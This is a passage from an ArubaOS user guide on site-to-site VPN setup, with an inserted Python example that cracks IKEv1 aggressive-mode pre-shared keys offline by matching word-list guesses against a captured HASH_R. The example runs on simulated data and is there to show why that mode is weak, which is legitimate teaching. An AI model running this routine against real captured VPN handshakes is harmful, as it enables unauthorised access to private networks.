User's Manual

356 | Virtual Private Networks Dell Networking W-Series ArubaOS 6.4.x| User Guide
(for IKEv1). For more information about importing server and CA certificates into the controller, see
Management Access on page 778.
Certificate-based authentication is only supported for site-to-site VPN between two controllers with static IP
addresses. IKEv1 site-to-site tunnels cannot be created between master and local controllers.
Working with Third-Party Devices
Dell controllers can use IKEv1 or IKEv2 to establish a site-to-site VPN with another Dell controller or with
third-party remote client devices. Devices running Microsoft Windows 2008 can use Suite-B cryptographic
algorithms and IKEv1 to support authentication using RSA or ECDSA certificates. strongSwan® 4.3 devices can
use IKEv2 to support authentication using RSA or ECDSA certificates, Suite-B cryptographic algorithms, and
pre-shared keys. These two remote clients have been tested to work with Dell controllers using Suite-B
cryptographic algorithms.
Working with Site-to-Site VPNs with Dynamic IP Addresses
ArubaOS supports site-to-site VPNs with two statically addressed controllers, or with one static and one
dynamically addressed controller. Two methods are supported to enable dynamically addressed peers:
• Pre-shared key authentication with IKE aggressive mode: The Dell controller with a dynamic IP address
must be configured as the initiator of IKE aggressive mode for site-to-site VPN, while the controller with a
static IP address must be configured as the responder. Note that when the controller is operating in FIPS
mode, IKE aggressive mode must be disabled. Aggressive mode sends the identity payload and the
PSK-derived authentication hash unencrypted, so anyone who captures the exchange can test pre-shared
key guesses offline; if you must use this method, use a long, randomly generated pre-shared key.
• X.509 certificates: IPsec peers identify each other using the subject name of their X.509 certificates.
IKE operates in main mode when this option is selected. This method is preferred from a security
perspective.
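The following is an added example, not part of the ArubaOS guide and not Dell code. It simulates what a
passive observer of an IKEv1 aggressive-mode exchange sees and shows why pre-shared key authentication in
that mode is the weaker of the two options above: the responder's HASH_R is computed exactly as RFC 2409
specifies (SKEYID = prf(PSK, Ni_b | Nr_b); HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)),
and every input to it except the PSK travels in the clear, so PSK guesses can be checked offline. The DH
public values, nonces, cookies, SA payload body, the FQDN branch.example.com and the word list are
constructed sample data; HMAC-SHA1 is assumed as the negotiated prf.

```python
"""Offline PSK guessing against a captured IKEv1 aggressive-mode exchange (RFC 2409).

Added example for illustration only; all wire values below are constructed placeholders.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, replace
from typing import Iterable, Optional

# Assumption: HMAC-SHA1 was negotiated as the IKE prf. HMAC-MD5 or HMAC-SHA-256 work the same way.
PRF = hashlib.sha1


@dataclass(frozen=True)
class AggressiveModeCapture:
    """Everything a passive observer sees in aggressive-mode messages 1 and 2."""
    g_xi: bytes    # initiator DH public value (message 1)
    ni_b: bytes    # initiator nonce payload body (message 1)
    cky_i: bytes   # initiator cookie from the ISAKMP header
    sai_b: bytes   # initiator SA payload body (message 1)
    g_xr: bytes    # responder DH public value (message 2)
    nr_b: bytes    # responder nonce payload body (message 2)
    cky_r: bytes   # responder cookie from the ISAKMP header
    idir_b: bytes  # responder ID payload body (message 2, unencrypted)
    hash_r: bytes  # HASH_R payload (message 2, unencrypted)


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """RFC 2409 section 5.4: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return hmac.new(psk, ni_b + nr_b, PRF).digest()


def compute_hash_r(psk: bytes, cap: AggressiveModeCapture) -> bytes:
    """RFC 2409 section 5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, cap.ni_b, cap.nr_b)
    msg = cap.g_xr + cap.g_xi + cap.cky_r + cap.cky_i + cap.sai_b + cap.idir_b
    return hmac.new(skeyid, msg, PRF).digest()


def simulate_aggressive_mode(psk: bytes, responder_fqdn: bytes) -> AggressiveModeCapture:
    """Build the capture an eavesdropper would obtain when the responder authenticates with `psk`.

    DH values, nonces and cookies are random placeholders (constructed data): HASH_R only
    needs the bytes as sent, not a real Diffie-Hellman relationship between them.
    """
    partial = AggressiveModeCapture(
        g_xi=secrets.token_bytes(128),            # placeholder for a 1024-bit group-2 public value
        ni_b=secrets.token_bytes(20),
        cky_i=secrets.token_bytes(8),
        sai_b=b"\x00\x00\x00\x01\x00\x00\x00\x01",  # placeholder SA payload body
        g_xr=secrets.token_bytes(128),
        nr_b=secrets.token_bytes(20),
        cky_r=secrets.token_bytes(8),
        idir_b=bytes([2, 0, 0, 0]) + responder_fqdn,  # ID type 2 = ID_FQDN, protocol and port zero
        hash_r=b"",
    )
    return replace(partial, hash_r=compute_hash_r(psk, partial))


def recover_psk(cap: AggressiveModeCapture, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Dictionary test done entirely offline: no further packets to either peer are needed."""
    for guess in candidates:
        if hmac.compare_digest(compute_hash_r(guess, cap), cap.hash_r):
            return guess
    return None


# Constructed sample word list.
WORDLIST = [b"password", b"aruba123", b"Summer2014", b"changeme"]


def demo():
    """Weak PSK falls to the word list; a 32-byte random PSK does not."""
    weak = simulate_aggressive_mode(b"Summer2014", b"branch.example.com")
    strong = simulate_aggressive_mode(secrets.token_bytes(32), b"branch.example.com")
    return recover_psk(weak, WORDLIST), recover_psk(strong, WORDLIST)


if __name__ == "__main__":
    found, not_found = demo()
    print("weak PSK recovered from capture:", found)
    print("random 32-byte PSK recovered from capture:", not_found)
```

In main mode the HASH_I and HASH_R payloads are carried inside the encrypted messages 5 and 6, so a
passive observer has nothing to test a guess against; with X.509 certificates there is no shared secret to
guess at all, which is why the guide prefers that method for dynamically addressed peers.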
Understanding VPN Topologies
You must configure VPN settings on the controllers at both the local and remote sites. In the following figure, a
VPN tunnel connects Network A to Network B across the Internet.
Figure 36 Site-to-Site VPN Configuration Components
To configure the VPN tunnel on controller A, you need to configure the following:
• The source network (Network A)
• The destination network (Network B)
• The VLAN on which controller A's interface to the Layer-3 network is located (Interface A in Figure 36)
• The peer gateway, which is the IP address of controller B's interface to the Layer-3 network (Interface B in
Figure 36)
Configure VPN settings on the controllers at both the local and remote sites.